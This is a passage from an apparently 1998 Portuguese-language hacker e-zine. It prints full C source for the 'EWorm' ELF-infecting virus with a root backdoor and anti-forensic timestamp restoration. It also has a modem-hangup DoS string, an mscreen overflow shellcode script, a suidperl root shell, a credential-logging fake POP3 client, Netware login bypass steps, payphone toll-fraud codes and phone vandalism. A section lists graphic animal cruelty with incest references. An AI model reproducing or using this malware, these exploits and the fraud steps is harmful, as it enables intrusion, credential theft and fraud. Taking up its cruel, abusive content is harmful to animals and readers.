encripta as vitimas; "escaneia" diretorios (pre-definidos), e usa uma backdoor rudimentar, que ajuda no processo de infeccao. Para ocupar ainda menos espaco, muitos tra- tamentos a erro foram suprimidos, mas tenho certeza que nao teremos maio- res problemas :P Um virus simples poderia ter menos da metade do tamanho do EWorm, mas difi cilmente se propagaria de forma eficiente, ainda mais no caso de ambiente Unix. A backdoor eh bem simples: a ideia inicial era de simplemente instalar uma SUID shell, mas ela nao transfere a UID 0 ao virus (pid) em execucao. A saida foi instalar o codigo bruto num arquivo (ja definido), e roda-lo normalmente. O interessante em se fazer isso - existem tecnicas muito me- lhores, mas como criador, eu nao posso dar o braco a torcer hehehe - esta na economia de espaco, e no fato do admin nao cair num prompt quando esti- ver che cando aquele estranho arquivo SUID 0. Cript() eh igualmente simples. Nosso algoritmo acronicamente chamado de 3Kfe (3 Key File Encription), usa 3 chaves distintas: a primeira infor ma o numero de bytes a encriptar, a outra diz quantas vezes serao rotacio- nados, e a ultima diz em que posicao o pointer vai iniciar a leitura dos dados mandados a primeira variavel. Problemas para os AV's, pois para desinfectar um arquivo eles terao de des cobrir onde comeca e onde termina o "corrompimento do arquivo" ou entao se dedicar a maravilhosas horas de brute-force, que num arquivo grande vao dar um trabalho e tanto (eu sei que eles podem seguir o virus, mas deixe eu me iludir um pouquinho.. :). .Riscos, blah blah.. e outras coisas mais.. A Internet Worm de R. Morris, era um complexo conjunto de arquivos cu jo unico objetivo era o de se copiar para o maior numero possivel de siste mas. Apesar de nao ser multi-OS (rodava em Sun Microsystems Sun-3 worksta- tions e VAX computers com uma variante da versao 4 do Berkeley Unix), a worm se expandiu de forma chocante. Me parece que o numero de exploits existentes e disponiveis em 1988 era ligeiramente menor que os de hoje... Os sistemas abertos e administra- dos por pessoas incompetentes, hoje sao maiores, e a grande Rede cresce a cada dia, aumentando ainda mais o numero de vitimas potencias. Eu fiz aqui uma variante do Eworm chamada de Brasilix, que alem de um nas ty code, tem algumas rotinas e modificacoes a mais, como por exemplo sniffing. O Brasilix se mostrou *muito* infeccioso, e seu tamanho nao exce deu muito as espectativas. Eh recomendavel o uso de shells mais seguras (ex. SSH), ou num futuro proximo, a tendencia eh que os desastres aumentem .Install - caso alguem queira testar Eworm para propostitos educacionais :) Recomendo executar esse procedimentos via UID!=0, pois nao acho saudavel rodar isso como root. Inicialmente, crie um diretorio e copie para ele o eworm.c e algum arquivo binario que voce deseje infectar. Compile e rode o eworm normalmente. O codigo encontra-se ao final do documento. .FAQ Abaixo vao respostas para alguns mails que recebemos de beta-testers, viti- mas e outras pessoas que tiveram acesso ao programa. 1) Eu compilei o eworm (gcc -o eworm eworm.c) e infectei um arquivo binario mas roda-lo, o proprio eworm foi infectado! O mais estranho e que ao tentar rodar o virus novamente (apos ser infectado) ele travou. Porque? R: Entenda que o virus eh um arquivo normal, e apesar de conter o codigo bruto em si, ele ainda nao possui a marcacao de infectado ('EW') e por is- so eh normalmente contaminado. O fato dele travar, eh porque por operar por loop's (while's, etc), quando voce roda um virus dentro de outro, ele meio que se perde, e "trava" (na realidade ele nao trava, apenas fica loopando). 2) O EWorm possui alguma fraqueza ou bug mais grave? R: Como todo programa que se preze, o EWorm tambem tem bugs! Alguns sao faceis de se corrigir, deixados no codigo publico apenas para "facilitar" a vida dos duhdinhas que vao rodar o virus sem ao menos entender o que ocorre Abaixo vai uma relacao do que (segundo minha opiniao) deve ser corrigido, e como "fixar" o problema.. Note que nenhum desses probleminhas pode compro meter o funcionamento do virus! Ele apenas nao ira rodar tao bem.. - Se o parent process durar mais do que o child, ele ainda estaram "lockado" quando o child executar um remove! Isso eh muito importante de se corrigir, para evitar rastros. Eh uma simples questao de se redirecionar o signal para um remove() :) 3) Quando o Brasilix, ou uma versao plena do EWorm sera liberada? R: Nos nao temos planos de fazer isso. A nossa versao privada do EWorm jah foi suficientemente modificada para evitar av's que se baseiem no codigo publico. Divulgar o nosso trabalho ira apenas prejudicar o bichano :) 4) A tecnica de backdoor pode ser mudada? R: A grande vantagem do EWorm, eh que apesar de um codigo que a primeira vista parece "meio confuso", altera-lo eh algo muito simples. Qualquer roti na pode ser alterada. Note porem, que estamos falando de um virus, e nao eh bom abusar do tamanho. 5) O EWorm roda em que sistemas operacionais? R: Aparentemente ele funciona bem em sistemas Linux (objetivo primario), e compativeis. Ouvi dizer que ele tambem eh bastante estavel em SunOS,Digital e System V. Caso alguem tenha algo a acrescentar ou retirar, reply.. 7) O virus foi disseminado? R: Sim e nao. O codigo pode ser facilmente alterado, podendo estar sendo distribuido por alguem, nesse exato momento. Alem disso, estou com um estra nho pressentimento a respeito dos hosts gov.br/mil.br. Melhor esse pessoal tomar cuidado.. talvez, muito cuidado sera o ideal. 8) Porque voces divulgaram apenas o codigo publico (que esta bugado)? Vai ver voces nao conseguiram terminar o virus, e estao esperando que alguem fa ca o trabalho sujo por voces.. R: Essa perguntinha nos recebemos de um certo administrador... A razao eh bem simples: nos somos egoistas e nao queremos perder horas de trabalho,des perdicada na mao de lamers irresponsaveis, ou de AV's. Se voce duvida da nossa capacidade, foda-se. Nos nao temos que lhe provar nada, o codigo fala por si proprio. 9) Porque usar "#define vTAM", se o tamanho do virus pode mudar dependendo do compilador utilizado na compilacao de eworm.c? O codigo nao fica tao por tavel, fica? R: dumped da Uground disse que o ideal seria utilizar um fseek e ftell ao inves de apelar para um define, tornado assim o codigo mais profissional e portavel. Acontece, que uma rotina dessa alem de aumentar o numero de aces- so ao disco (sim, o acesso eh insignificante, mas ainda existe) aumentaria o codigo em alguns bons bytes. Eu ainda prefiro compilar, ver o size, mudar no #define e recompilar, do que apelar pra isso... estamos fazendo um virus ele nao precisa ser portavel. O codigo teria de ser +- assim (fiz de cabeca isso eh apenas pra voce ter uma ideia) :) FILE *fp; int vTAM; fp=fopen(argv[0],"r"); fseek(fp,0,SEEK_END); vTAM=ftell(fp); Acho que isso deve resolver para os mais "profissionais" =) ---------------------------------------------------- /* Elf Worm Project Copyright (c) 1998, Dr.sm0g [TAff] Techno Affliction iNC. Made in Brasil. sm0g@psynet.net / taff@psynet.net "Aos que sabem, nada precisa ser dito. Aos que nao sabem, menos ainda, pois nunca estao disposto a escutar." TAff Labs: Internet Terrorism trought source code >:] eworm.c */ #include #include #include #include #include #include #include #include #include #include #define vTAM 28525 /* gcc -O eworm.c size */ FILE *fp; DIR *dirp; long int icnt, bd, i; char Elf[5]={0x7f,0x45,0x4c,0x46,'\0'}, /* ELF file ID */ Ebuf[5]={'\0'}, ID[3]={0x45,0x57,'\0'}, /* ID[3]=EWorm ID mark */ Path[50], Buff[100], Ntm[30],Nom[30]="/tmp/"; struct dirent *dirf; struct stat info,*ip; struct utimbuf dtime; main(int argc, char *argv[], char *envp[]) { getcwd(Path, 30); strcat(Nom, argv[0]); /* /tmp/argv[0](clean) */ strcat( strcat(Path,"/"), argv[0]); /* path de argv[0] */ stat(argv[0], ip = &info); /* nosso status */ /* verifica se estamos rodando na forma de backdoor */ if( (getuid() == 0) && (ip->st_size == vTAM) ) bd=1; /* faz o fork, desencripta argv[0] e manda-o limpinho p/ /tmp, onde eh */ /* rodado pelo processo pai. */ if( (bd == 0) && (ip->st_size != vTAM) && (fork()) ) { sprintf(Buff, "tail -c%ld %s>%s", (ip->st_size)-vTAM, argv[0], Nom); Cript(argv[0], 2); PrnMod(Nom); execve(Nom,argv,envp); } else { /* somos root -> criamos uma backdoor para as futuras geracoes :) */ if( (getuid() == 0) && (ip->st_size != vTAM) ) { sprintf(Buff,"head -c%ld %s>/tmp/backd", (ip->st_size)-vTAM, argv[0]); system(Buff); } /* nao somos root -> verificamos a presenca de uma backdoor ja feita..*/ if( (getuid() != 0) && ( access("/bin/backd", F_OK) ) == 0) { system("/bin/backd"); exit(0); } /* para nossa leitua de brute-force.. */ dirp = opendir("."); do { /* caso chegue ao fim do diretorio, sem ter infectado ao menos 2 ar */ /* quivos, chdir() de acordo com a uid do usuario que esta rodando. */ if( ((dirf=readdir(dirp)) == NULL) && (icnt !=2 )) { if( chdir(bd==1 ?"/bin" : getenv("HOME") ) == 0) { icnt++; dirp = opendir("."); dirf = readdir(dirp); } else break; } /* se tiver u+rwx no arquivo (o root tem ugo+rwx), continue */ if( access(dirf->d_name, R_OK| W_OK| X_OK) == 0) { /* pega status do arquivo e verifica se ele nao eh um FIFO maluco.*/ stat(dirf->d_name, &info); if( ( (info.st_mode&S_IFMT) == S_IFREG) ) { /* abre e verifica se eh um arquivo ELF autentico.. */ fp = fopen(dirf->d_name, "r+"); fread(Ebuf, 4 ,1, fp); if( strcmp(Ebuf, Elf) == 0) { /* verifica se ja esta contaminado.. */ bzero(Ebuf, 4); fseek(fp, -2, SEEK_END); fread(Ebuf, 2, 1, fp); if( strcmp(Ebuf, ID) !=0 ) /* Ho! Hora do rango! */ { fseek(fp, 0, SEEK_END); /* vai pro fim do arq */ fwrite(ID, 2, 1, fp); /* e coloca nossa ID.. */ fclose(fp); /* o enviamos para /tmp, encriptamos e setamos o virus nele*/ strcat( strcat(Ntm, "/tmp/"), dirf->d_name); sprintf(Buff,"head -c%i %s>%s;cat %s>>%s",\ vTAM, Path, Ntm, dirf->d_name, Ntm); Cript(dirf->d_name, 1); /* substituimos o original pelo /tmp/vitima (infectado).. */ sprintf(Buff, "cp %s .;rm %s", Ntm, Ntm); system(Buff); dtime.actime=info.st_atime; /* restauramos atime */ dtime.modtime=info.st_mtime; /* restauramos mtime */ utime(dirf->d_name, &dtime); /* seta-os.. */ PrnMod(dirf->d_name); /* restaura perm/own */ bzero(Ntm, 30); icnt++; } /* if ID */ } /* if ELF */ } /* if(access.. */ } /* if(stat) */ } while( (dirf != NULL) && (icnt <= 2)); } /* fork() */ /* nosso remove() bugado (ver documentacao), remove o tmp de argv[0].*/ remove(Nom); } /* main() */ /* --- funcoes adicionais --------------------------------------- */ PrnMod(char *arq) /* talvez isso seja desnecessario, mas eh safe code. :)*/ { i = chmod(arq, info.st_mode); /* restaura permissoes */ i = chown(arq, info.st_uid, info.st_gid); /* restaura owners */ } Cript(char *arq, int opt) { /* KEY=chave da encriptacao, NUM=numero de bytes a encriptar */ long int len = strlen(arq), KEY = (len+2)*3, NUM = (len*7)-5, Ep[NUM]; /* chave1: vTAM+strlen(arq)*8=numero de bytes a deslocar o ponteiro */ fp = fopen(arq,"r+"); fseek(fp, vTAM+strlen(arq)*8, SEEK_SET); for(i = 0; i Botao de desligar o telefone... :) \__ __/ Bom, o plano e' o seguinte, primeiro voce tira o telefone do gancho e digi ta o codigo 109, depois de apertado o numero, bata com o speaker do telefo ne o mais forte possivel fazendo com que o botao de desligar fique preso, assim o 109 fica tocando mesmo depois que uma pessoa tirar o telefone do gancho, em alguns lugares o numero de toques padrao sao de 36 toques, mas em outros telefones, podem ser 50 ou ate mesmo 100, boa sorte :) - Fudendo com interfones by bloodroot Bom, em alguns interfones de marcas estupidas (cujo nomes nao vem ao caso) eles fazem uma contrucao eletrica e estetica tao mal feita que um simples crianca pode puxar um fio do interfone e tomar um choque. Entao lutando por estas "extraordinarias" criancas, a Phone9 ensina como fuder este tipo de interfones :) Dedicado para: Thiago, Peitao. 1. Primeiro com um faca, passe-a por entre a extremidade inferior do inter fone a faca, quando ela chegar ao outro lado, ela devera carregar com ela alguns fios da cor laranja ou preto. 2. Uma vez que o fio estiver para fora, pegue aquele alicate esperto que voce guarda para quando a sua mulher quiser ver "Maria Hiena", e corte es- tes fios, e nunca mais (ate a companhia sercomtel chegar), ninguem ira fa- lar no telefone ou criancas serao "chocadas" com os interfones :) - Nasty stuff's to do with kats by kleptomaniak Well, this is my first writing for P9, and today i'm going to teach you dumbasses, how to fuck up a cat, and get a ride of it :) So joing the fun kye horse, and lets begin tha fun. Okay, so, you're walking on the street and then you've a nice and little puffy catty, so then your girlfriend come around to play with it and you as soon as you can, read this shit. Top 20 stuff's to do with a cat if you can get one: 10. Pegue um pedaco de barbante e prenda uma bolinha em uma das pontas, de pois pegue uma ponta e amarre-o no rabo do gatinho, agora jogue a pon- ta com a bolinha para o gato e veja ele ficar mais tonto que barata em concerto de sapateado :) 9. Essa e' malvada, pegue uma gatinha no cio e coloque perto de um macho, mais ou menos em uns 5 minutos o macho estara de peru para fora espe- para cravar na bichinha, entao voce pega o gelol e PSSSIIIII bem na ca beca do pintu dele, e veja o gato correr de um lado para o outro sen- tindo muito dor... O mesmo pode ser feito com pasta dente. 8. Quando a gatinha estiver no cio, pegue uma caneta bem grossa e enfie na bunda da gatinha e espere ate ouvir gemidos. 7. Arranque os bigodes do gato, e coloque-o para andar em algum lugar que seja necessario muito equilibrio e veja-o cair no chao sem nenhum senso de direcao :) 6. Gatos adoram presunto, entao de a eles presunto, mas coloque dentro do presunto fatias bem pequenas de prozak e veja o gato ficar hiperativo, esta e' hilariante. 5. Tente ensinar o gato a transar, mostrando a ele um ato de sexo ao vivo por exemplo o do seu pai e sua mae. 4. Influencia corneadas familiares e surubas, por exemplo pegue o filho coloque-o para fuder com a mae. 3. Coloque o gato para fazer xixi em um formigueiro, quando ele cavar o buraco o exercito do formigueiro inteiro ira subir no cu do gatinho e entao miau, miau para voces :) 2. Vire o gato de cabeca para baixo e pendure-o em algum lugar, ate que todo o sangue va para a cabeca, entao o gato comeca a chorar... 1. Quando ele estiver comendo pegue a cabeca dele e prenda no pote de co- mida, o gato ira vomitar ate nao poder mais. Estas foram as dicas nasty para se fazer com gatos por kleptomaniak, proxima edicao tem mais sobre sapos e passarinhos :) [ telnet loop ] ---------------------------------------------------------- by bi0h4zard Esta e' antiga, mais ainda existem pessoas que nao sabem como se proteger e nem como executar o bug do telnet na porta 19 (chargen), esta e' bem simples de se fazer e de se proteger... executando a bug: p9~:/root> telnet 127.0.0.1 19 e entao um bando de caracteres loucos estarao aparecendo na tela do seu linux ou unix. Protefendo-se do bug: Bom, apenas abrir outra secao em outro terminal e depois apenas de um kill no processo: p9~:/r007> ps 00 tty01 telnet 127.0.0.1 19 p9~:/r007> kill 00 E pronto, tudo se resolve rapidinho. [ Modem Denial Of a Service ] -------------------------------------------- by SEkr4t7 Esta devolta um antigo bug na entranhas do modem, que permite que voce de um crash no modem. E o mais interessante do bug e' que depois de mais de aproximadamente 10 anos, em que o bug existe, nada foi feito para impedir que o DoS seja feito. Para executar o bug: sek~:/> telnet 127.0.0.1 21 Trying 127.0.0.1... Connected to 127.0.0.1 Escape Charactere is '^]'. 220 FTP SEkt0r37 - (fuck.org) # comando bugante :) USER +++ATH0 ^] #saindo... Entao, se voce fizer o comando denovo a rede tera caido, e a conexao PPP, estara totalmente morta... Eu estou trabalhando em um codigo que fara isto para voce, enviando diretamente para a primeira porta aberta anonyma, entao aguarde na proxima edicao da P9 :) Caso voce esteja conectado no sendmail (25), use o comando: VRFY +++ATH0 [ mscreen buffer overflow ] ---------------------------------------------- by pr0k Mscreen, programa usado para exibir caracteres especiais e ASCII, tem um buffer overflow... Exploite-o (somente para Unix-sco). --[ mscreen-sco.sh ]-- #!/bin/sh echo '***4.999,99***('\ '\0220\0353*]U\0376M\0347\0376M\0353\0376M\0354\0376M\0355\0377E\0357\0376M' \'\0364\0303/bin/sh\01\0215\05;\01\01\01\0232\0377\0377\0377\0377\07\01\0307 '\'\0304"\0365\04\010\0350\0313\0377\0377\0377\0201\0305\0357\0377\0377\0377 U'\'U\0201\0305\0361\0377\0377\0377U\0350\0324\0377\0377\0377)'>$HOME/.msrn echo 'leshka:*leshka**leshka**leshka*#\0365\04\010:'>$HOME/msrncap MSCREENCAP=$HOME/mscreencap TERM=leshka; export MSCREENCAP TERM echo "Type any command than press and -D" cat|/usr/bin/mscreen;rm $HOME/.msrn $HOME/mscreencap --[ mscreen-sco.sh ]-- [ Perl Exploiter ] ------------------------------------------------------- by H. b0ws O codigo abaixo, exploita suidperls, que sao a forma mais estupida de se executar um programa em linux. --[ perl-ex.sh ]-- #!/usr/bin/suidperl -U $>=0; $<=0; exec ("/bin/sh"); --[ perl-ex.sh ]-- Na shell... $ chmod 4755 perl-ex.sh $ ./perl-ex.sh # E tudo fica beleza :)... _ ______________ ________[_] _______ _ \_ /_______ __ _____________ / \ \ \/ ___/ \/ \ / -- / // / \ \ ____/ - \ / -- \ \_\ ___/ / / / / - /\ \||/ / ___/ ___/ /____\ \____\___\/\__/ _/ ______/\________/ \__/\__/____ \ __ \ /_____/ \/-----/ \/\/ \/ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³14 - IIS security issues, trabalhando com logs. ³°° ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ by bloodroot ³°° ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ°° IIS 40 server da microsoft, possui um interessante sistema de log que pode ser facilmente configuravel por qualquer administradores. O simples ato de se manter um sistema de logs no IIS, podendo controlar o acesso nos servi- cos http, e ftp. Bom, sem mais demoras, na tentativa de fazer um texto dinamico, ai vao as tecnicas... .Configurando log WWW (http): Quando olhando para um arquivo de log, voce deve ter na mente que as infor macoes necessarias deverao estar facilmente dispostas para que a visao do administrador sobre o log seja rapida e conclusiva :) Os arquivos LOG, podem te dar historicos sobre conexoes feitas sobre deter minados IP addresses, que ultimamente visitaram o seu site, contendo toda a documentacao de troca de dados ftp, ou http, entre outras informacoes que podem garantir um pouco mais a seguranca do seu site ou servidor. Basi camente estas sao as maravilhas que o arquivo de log do IIS pode fazer por voce. Passo-a-passo, para configurar o sistema de log: 1. Selecione iniciar|Programas|Windows NT 4.0 Option Pack| Microsoft Inter net Information Server| Internet Service Manager (ISM)| e logo apos isto ira abrir-se uma janela chamada MMC (Microsoft Management Console). 2. Clique com o botao-direito do mause, no website que voce deseja configu rar. 3. Clique no botao de propriedades. Entao aparecera a janela de proprieda- des do website... 4. Clique em "Enable Logging". 5. E entao escolha a opcao de log que mais se adequa ao seu sistema. Veja: .Microsoft IIS log Format. Este e' fixado no formato ASCII de texto, ele loga os acessos nos seguintes items: - Username - IP address - Numero de bytes recebidos - Codigo de status do HTTP - Data requisitada no sistema - Tempo de conexao ao sistema Este log e em formato ASCII o que permite que seja visto em quase todos os editores de textos de todas as OSs que voce imaginar. -- .NCSA Common Log File Format. Este tambem e' baseado em formato ASCII, su- portato pode National Computer Supercomputing Applications (NCSA). Neste log, ele grava as seguintes informacoes: - UserName Remoto - username - Codigo de status do HTTP - Tipo de arquivo requisitado - numero de dados requisitados - Tipo e numero de arquivos recebdiso pelo servidor Basicamente igual ao IIS. :) -- ODBC logging. Suportado pelo tipo de arquivo que e' anexado a uma database este log grava as seguintes informacoes: - IP address - username - data requisitada - data recebida - byte enviados - acoes executadas pelo cliente - Host de onde veio e para onde foi. :) Este log e anexado a um certo grupo de arquivos, permitindo que voce somen te grave o log de acoes em determinados em diretorios, como o de usuarios, e ou ate de todo o servidor. E' necessario determinar isto antes de habili tar este log. -- W3C Extended Log File Format. Ate agora, este e' o melhor log ja testado e usado para databases IIS 4.0 e outras em toda a minha vida, ele faz syslog parecer codigo de crianca perto dele :) Usando um sistema ASCII de log, esta e' a opcao padrao usada pelo IIS, em- bora eu aconselho que voce nao mude-a. Voce pode acrescentar varias configuracoes a este log, que estao dispostas nesta mesma janela, mas na opcao padrao voce tem os seguintes componentes: - IP address - IP address do servidor - Porta do Servidor - Codigo de status HTTP - Data solicitada - Tempo de download da data. A data e' separada em espacos neste formato de log. Para acrescentar mais componentes no log, faca o seguinte: 1. Clique no botao de propriedades. Entao a janela "Extended Logging Pro- perties". 2. Na secao "New Log Time Period", coloque o tempo em que voce quer que o IIS crie um arquivo de log, para o website selecionado, voce pode colocar a opcao para somente criar o log quando for 20:00h. da noite, assim voce pode acessar o log assim que voce chegar do trabalho :) 3. Entre o diretorio do qual voce quer guardar o log dentro: O padrao e' %WinDir\System32\LogFiles. Clique no browser para selecionar outro diretorio. 4. Clique na opcao "Extended Properties tab" para mostrar as opcoes de log que o W3C oferece (esta opcao sera mostrada quando voce selecionar a opcao W3C Extended Log File Format). Voce pode acessar esta opcao, acessando a opcao describe (descricao) na tabela no.1, a opcao de default do W3C. in- cluem as opcoes mostradas acima. E as novas opcoes: - Data da atividade - Tempo da atividade - Endereco IP do cliente - Endereco IP do servidor - User Name - Nome do Servidor - Porta do servidor - Acao que o cliente executo (METHOD) - Mostra as atividades no seu sistema URI, como as paginas que o usua rio acessou, como pagina HTML e programas CGI. - URI Query, Loga as strings que o usuarios tentou acessar que falha- ram ou funcionaram. - Win32 Status, status do cliente em acao. - Bytes enviados - Bytes recebidos - Agente do usuario. - Cookie mandados ou recebidos. - Referrer, URL do usuario. Lembramos que com tanta opcao, voce pode ativar todas estas, mas o seu ar- quivo de log pode chegar a 19mb ou ate 300mbytes em dias ou semanas, entao procure sempre tacar o lixo fora :) [ Na proxima edicao ] IIS security Issue 02, saira' trazendo informacoes sobre os seguintes sis- temaS: IIS Server LOG file v2.0, IIS server Bugs. IIS server security force: bloodroot - blood@phone9.org bi0h4zard - bio@mutexx.net - Internet Information Server Security Issues - A Phone9 Project. ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³15 - Novell Netware login Hack ³°° ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ by bloodroot ³°° ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ°° Esta tecnica eu fiz na minha escola (os administradores de la ficaram ma- lucos :)) basicamente ela se divide em duas partes, uma que e' inofensiva ao sistema, que somente e' usada para impressionar os seus amigos :) e a outra e' que voce pode usar para entrar no sistema sem precisar passar pe lo netware logon, apenas forcando uma saida de erro no sistema de logon. - Tecnica no.01 [inofensiva] Nesta tecnica voce muda a mensagem padrao que aparece no inicio do logon, "You must login before geting on the system", entao voce pode muda-la p/ qualquer outra mensagem que voce queira, colocando mensagens terroristas como "A diretorio e' uma filha da puta!!!", entre outras, use suas imagi- nacao, n3rd. Faca o seguinte para executar tal tarefa :) - Otimo, log-se no sistema e faca o seguinte: c:\windows\regedit.exe - editor de registros Va na chave: HKEY_LOCAL_MACHINE\SOFTWARE\microsoft\windows\CurrentVersion\WinLogon, La dentro altere os registos "LegalNoticeCaption" e "LegalNoticeMsg" e as- sim, voce muda o conteudo destes registros e depois e' claro, amedronta os bostinhas da sua sala :) - Tecnica no.02 [malvada :] Nesta tecnica voce impede que a tela de login (animada.) do Netware Logon apareca no sistema toda a vez que voce entrar no sistema, assim voce pode entrar no sistema, mesmo sem ter a senha ou ate mesmo um login valido :) Faca o seguinte para executar tal tarefa: - Ligue o computador, log-se uma vez no sistema... Depois que voce se logar, va no diretorio: c:\windows\nls\english\ e delete o arquivo login.dat ou entao apenas mude o nome do bichano, que assim quando voce for se logar no sistema o netware logon ira mostrar uma mensagem de erro assim: "Error Message: Unable to Open or Find the file c:\windows\xxxxx\login.dat" Esta e' bem legal, para fazer na rede inteira assim ninguem se loga e o ad min fica boqui-aberta para tal forca hack power :) Novell NetWare Logon Hack, by blood@phone9.0rg | blood@deathknights.com | blood@puruca.com.br ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³16 - POP3 sniffer ³°° ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ by bloodroot ³°° ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ°° Post Office Protocol v3, e' um dos mais bugados protocolos da historia dos emails, ele nao chega a barrar o sendmail :) Mas ja e' um comeco na histo- ria da rootshell. O sniff funciona simplesmente como um cliente que captura o logins e pass- word que uma vez digitados estao disponiveis em arquivo texto-puro (ASCII) O que acontece e: Quando o usuario recebe a mensagem "Login:" e "Password" Automaticamente a variavel $login e $pass, e' copiada para um arquivo log, onde ficarao os sniffers e logo depois com as mesmas variaveis serao usa- das para se logar em um sistema POP3 que o usuarios especificar :) obs. Este sniffer nao faz nenhuma tecnica com o protocolo em si, mas permi- te que voce captura as senhas que voce quiser, desde que este seja co- locado no lugar do cliente oficial para acessar o POP3. :) alph1x t3k esta fazendo um sniffer para POP3 diretamente dentro do pro tocolo junto com outras maravilhas do TCP/IP bugadao, entao aguardem e contemplem o phuturo :) Veja o codigo do sniffer: [ pop3client ] #!/bin/sh log = #arquivo onde ficara o log do sniffer echo "Login:" read login; echo "Password:" read pass; echo "Pop3 server:" read pop; echo "Direcionar mail para o arquivo:" read arquivo; echo "----" >> $log echo "login: $login - Password: $pass - Pop Server: $pop" >> $log popclient -3 -u $login -p $senha -o $arquivo $pop [ Pop3Client ] O codigo de acesso ao servidor foi baseado no codigo by Acidmud. ······· contact: [blood@phone9.org]|[acidmud@axur05.org] Phone9, Inc. - Post Office Protocol v3.0 Sniffer ······· ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³17 - 0800 hack-a-call ³°° ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ by dare devil ³°° ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ°° [ Dare devil productions, 1998. ] [ daredevil_br@hotmail.com - daredevil@phone9.org ] 0800 hack-a-call, ligacoes de graca por meio de numeros 0800. Estados que sao expostos a vulnerabilidade: - Sao Paulo (interior???) - Rio de Janeiro (interior e capital) - Bahia e nordeste Qualquer novo teste enviar para: daredevil_br@hotmail.com - LIGANDO DE GRACA DE ORELHÕES, por meio de linhas 0800 - Bom, existem muitos textos na Net ensinando a fazer ligacoes a partir de telefones publicos de maneira gratuita ... mas essa daqui e nova !!!! Preste atenção: Tire o orelhão do gancho e disque: 0801 111 234 (apos voce discar esse numero das duas uma, ou a mensagem programada ira dizer que nao existem linhas disponiveis para ligação - ai e so voce ligar novamente em seguida que no maximo na quarta tentativa da certo - ou vai mandar voce aguardar um instante... Fique despreocupado que e tudo gravacao você não fala com ninguém ...) Logo apos isso a mensagem ira pedir que voce digite o codigo, digite um dos codigos abaixo: Cod.: 42029695 42029595 42029592 (Caso de algum problema esses codigos tente outras variacoes que uma hora da certo...) Depois de digitar o codigo voce devera digitar o prefixo do numero do tele fone que voce quer ligar, por exemplo (011)... ai e so digitar o prefixo e depois o número... Ex.: 011 234-5678 Obs.: Esse truque foi descoberto e testado no estado de SP, ainda não sei se funciona fora daqui ... Os estados do qual outras pessoas testaram esta fa- lha esta logo acima :-) Esse truque nao funciona quando feito atraves de telefones particulares!! So em orelhões ... ------- Texto produzido por Daredevil e-mail: daredevil_br@hotmail.com UIN=3266647 E livre a distribuicao desse texto desde que mantido o Copright, nao tenha uma atitude Lamer substituindo meu nome pelo seu... Falow!!!! ------- Cumpre lembrar que isso so esta aqui para fins educacionais... entao saiba que eu Nao tenho absolutamente nada a ver com o que voce fizer com este docu mento em si :-) Face yer own problems. Copyrights 1998, dare devil productions daredevil_br@hotmail.com | daredevil@phone9.org ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³18 - Wire Tapping!!! Hackeando linhas telefonicas ³°° ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ by bloodroot ³°° ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ°° Sekurity Hazard Project, Inc. .98| Phone9 Production. Wire tapping, hackeando linhas telefonicas. Phone9 krimelabs. "lye, cheat, steal, fight, muder, the P9 "guide to the real way of life. " Prefacio, Este guia e dedicado as companias de telecomunicacoes como telerj, telesp, telebahia entre outras... Que a um bom tempo, vem tratando uma das mais rapidas formas de comunicacao, como lixo, ja que o monopolio desta empresa e' devasstadora, ou voce usa uma delas ou voce nao usa nada. Neste guia eu explicarei como roubar a linha de outra pessoa, usando-a para fazer liga- coes de graca para qualquer lugar do mundo. Nos acrescentamos que este ti- po de acao, pode dar cadeia, com uma pena de 1 a 7 anos de carceraria, en- tao, nos aconselhamos que voces pensem duas vezes antes de concluirem pen- samentos anarquistas, e historias insolitas nas linhas de outras pessoas. Este guia tambem e' dedicado para as pessoas que tem me ajudado ao longo do anos, a todos estes 